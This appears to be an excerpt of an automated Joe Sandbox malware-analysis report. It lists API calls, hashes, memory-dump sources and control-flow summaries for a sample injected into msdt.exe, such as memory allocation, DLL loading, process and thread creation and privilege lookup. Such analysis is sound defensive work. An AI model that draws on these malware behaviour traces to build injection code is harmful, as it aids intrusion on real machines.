                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00098809
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction ID: 9aeae7068cb3c7e3eec2614198bd98a9e5c4f939deac999703a2041c7f7e535f
                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction Fuzzy Hash: DBF015B2200208ABCB14DF89CC81EEB77ADFF88750F118148BE0897242C630F810CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                            • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                            • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                            • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                            • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                            • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                            • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                            • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                            • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                            • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (figure omitted): basic blocks 97310-97432; calls 9a030, 9a100, 89b50, 93e60, 96f40, 97140 and Sleep
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 000973B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (figure omitted): basic blocks 97306-97432; calls 9a030, 9a100, 89b50, 93e60, 96f40, 97140 and Sleep
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 000973B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (figure omitted): basic block 988c0-988f1; calls 991f0 and RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5,?,00093CBF,00093CBF,?,00093546,?,?,?,?,?,00000000,00000000,?), ref: 000988ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: F5
                                                                            • API String ID: 1279760036-1354453618
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (figure omitted): basic block 98900-98931; calls 991f0 and RtlFreeHeap
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009892D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID: .z`
                                                                            • API String ID: 3298025750-1441809116
                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction ID: e173cf95a5ac2eb2f0bede8c32dec4c31e5bca9719e9474d996d1bc74e89b614
                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                            • Instruction Fuzzy Hash: 17E046B1200208ABDB18EF99CC89EE777ACEF88750F018558FE085B252C630F910CAF0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 164 87314-87316 165 87318-87378 call 9a150 call 87290 call 999e0 164->165 166 872b2-872bc 164->166 182 87380-873b2 call 8d3e0 call 98790 165->182 167 872c3-872da call 93e60 166->167 168 872be call 89b50 166->168 174 872dc-872ee PostThreadMessageW 167->174 175 8730e-87312 167->175 168->167 177 8730d 174->177 178 872f0-8730b call 892b0 PostThreadMessageW 174->178 177->175 178->177 188 873b4-873bc 182->188 189 873e7-873ef 182->189 190 873be-873c5 188->190 191 873d6-873e0 188->191 190->191 192 873c7-873ce 190->192 191->182 193 873e2-873e5 191->193 192->191 194 873d0-873d4 192->194 195 8740d-8741f call 98720 193->195 194->191 196 873f0-8740a call 9a0d0 194->196 195->189 201 87421-8748c call 97fa0 195->201 196->195 201->189 204 87492-874ee call 97fe0 201->204 204->189 207 874f4-87541 call 99680 call 996a0 call 9a3c0 call 9a0d0 call 93a60 204->207
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872EA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008730B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 20216d12b598d7dd3ab8ef6f9dc82bf46761b7aa7108745876e10788f12135c7
                                                                            • Instruction ID: db525ed048f640a50523bd3b642cc5f910bd28b563ca4b271d9a01607a013025
                                                                            • Opcode Fuzzy Hash: 20216d12b598d7dd3ab8ef6f9dc82bf46761b7aa7108745876e10788f12135c7
                                                                            • Instruction Fuzzy Hash: 6161A171A04209AFDB24EF64DC85BEBB7E8BB45300F10056DF95D97242DB70AA41DBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 218 87290-872da call 9a150 call 9ad30 call 89b50 call 93e60 227 872dc-872ee PostThreadMessageW 218->227 228 8730e-87312 218->228 229 8730d 227->229 230 872f0-8730b call 892b0 PostThreadMessageW 227->230 229->228 230->229
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872EA
                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008730B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                                            • Instruction ID: c9f3801c9264246f694cb4ebb2110608ca924a94960e7eeeadd2611c47b060f8
                                                                            • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                                            • Instruction Fuzzy Hash: BA01DB31A8022877EB21B6949C03FFE776C6B41F51F150114FF04BA1C2E6D4AA0647F6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 428 89b50-89b79 call 9af80 431 89b7b-89b7e 428->431 432 89b7f-89b8d call 9b3a0 428->432 435 89b9d-89bae call 99730 432->435 436 89b8f-89b9a call 9b620 432->436 441 89bb0-89bc4 LdrLoadDll 435->441 442 89bc7-89bca 435->442 436->435 441->442
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction ID: 6be21db2e01ad6bdfd2057ebe30773d7d0aef07c0e2e3892c1cd6ef38e03a6ee
                                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction Fuzzy Hash: 59011EB5E0020DBBDF10EAE4ED42FEDB7B8AB54708F0441A5E90897242F671EB14DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 443 98970-989c8 call 991f0 CreateProcessInternalW
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000989C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction ID: 8f8d720702bca44fa8495978207ccdb00b5468ff596cbcfdfa1b4e43ee5a6535
                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                            • Instruction Fuzzy Hash: B201AFB2210108ABCB54DF8DDC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 446 97440-97468 call 93e60 449 9746a-97486 call 9d582 CreateThread 446->449 450 97487-9748c 446->450
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CD00,?,?), ref: 0009747C
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: d6830f6d31632154abbcedb5bbd99aa7626e937d2c32e0f59dd912f69b1dbb5f
                                                                            • Instruction ID: cf70ed0d8889029084224b074ff12f2092f9ca6736733930c81a7263dc1a1fe5
                                                                            • Opcode Fuzzy Hash: d6830f6d31632154abbcedb5bbd99aa7626e937d2c32e0f59dd912f69b1dbb5f
                                                                            • Instruction Fuzzy Hash: 5CE092333903143AE730659D9C03FE7B79CCB91B24F150026FA0DEB2C2D595F90152A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00084965,00000000,00000000,00700069,?,00083B93), ref: 00097F11
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Path$NameName_
                                                                            • String ID:
                                                                            • API String ID: 3514427675-0
                                                                            • Opcode ID: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                                            • Instruction ID: 7d40bab9ad0abbdc887d54c330b51a098e263da9d547853703a13ac23a31dc82
                                                                            • Opcode Fuzzy Hash: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                                            • Instruction Fuzzy Hash: 3CE0E5B5600208ABCB14DF88CC85EA77BACEF88650F008458BA1897242C670F9108BE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFD2,0008CFD2,?,00000000,?,?), ref: 00098A90
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction ID: be68d532b7e68d26078d865cd4f364f759679e17a6e248d01e880f16462818d1
                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                            • Instruction Fuzzy Hash: 38E01AB12002086BDB10DF49CC85EE737ADEF88750F018154BE0857242C930E8108BF5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00087C93,?), ref: 0008D46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
